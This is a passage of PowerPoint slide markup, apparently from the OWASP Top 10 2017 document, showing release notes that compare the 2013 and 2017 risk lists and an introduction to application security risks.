                        <a:t>A10-Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, while found in approximately 8% of applications, it was edged out overall by XXE.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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3" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1346813869"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5455920"/>
          <a:ext cx="6858000" cy="3688080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3247102">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="334298">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3276600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="332204">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ct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OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a: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2013</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baseline="0"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800" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin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OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a: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 2017</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solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1 – Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin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dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017-Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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A2 – Broken Authentication and Session Management</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A2:2017-Broken Authentication </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2"/>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A3 – Cross-Site Scripting (XSS)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A3:2017-Sensitive Data Exposure</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3"/>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A4 – Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A7]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>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alpha val="20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b="1" kern="1200"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A4:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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04"/>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A5 – Security Misconfiguration</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A5:2017-Broken Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[Merged]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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5"/>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A6 – Sensitive Data Exposure</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A6:2017-Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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06"/>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A7</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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Missing</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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Function</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mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Level</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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Access</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err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Contr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>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alpha val="20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b="1" kern="1200"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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting (XSS)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0007"/>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A8 – Cross-Site Request Forgery (CSRF)</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kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>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A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW, Community]</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08"/>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A9 – Using Components with Known Vulnerabilities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kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>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A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Using Components with Known Vulnerabilities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9"/>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A10 – Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>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kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>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A10:2017-Insufficient</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NEW,Comm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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dirty="0"/>
              <a:t>RN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Release Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2688431" y="7439819"/>
            <a:ext cx="858839" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B"/>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10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117852" y="7010400"/>
            <a:ext cx="615948" cy="394295"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 515"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B"/>
            </a:solidFill>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="stealth"/>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 name="Table 22"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73306004"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="3962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6278">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Are Application Security Risks?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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626122">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="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600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pP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Sometimes these paths are trivial to find and exploit, and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it</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may </a:t>
                      </a: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put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine your</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overall risk.</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5" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="275144" y="1839310"/>
            <a:ext cx="6201856" cy="2102620"/>
            <a:chOff x="275144" y="2088380"/>
            <a:chExt cx="6201856" cy="2102620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="3343275"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5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sp>
            <p:nvSpPr>
              <p:cNvPr id="5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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="495300" y="2505077"/>
              <a:ext cx="139699" cy="304801"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7"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latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8"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9"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10"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11"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2490788"/>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Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="275144" y="2088380"/>
              <a:ext cx="575800"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19" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="2466975"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 125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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2466971"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3"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endParaRPr lang="en-US" sz="85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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="498475" y="2924177"/>
              <a:ext cx="139699" cy="304801"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25"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latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26"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7"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8"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9"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2924175"/>
              <a:ext cx="838200" cy="357187"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20889"/>
                <a:gd name="adj2" fmla="val 24667"/>
                <a:gd name="adj3" fmla="val 34667"/>
                <a:gd name="adj4" fmla="val 8013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Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1325915" y="2088380"/>
              <a:ext cx="607859"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Attack</a:t>
              </a:r>
            </a:p>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Vectors</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
